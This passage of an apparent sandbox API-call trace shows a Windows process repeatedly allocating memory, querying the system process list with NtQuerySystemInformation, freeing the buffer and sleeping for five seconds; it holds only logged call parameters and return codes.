BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.576] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.710] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 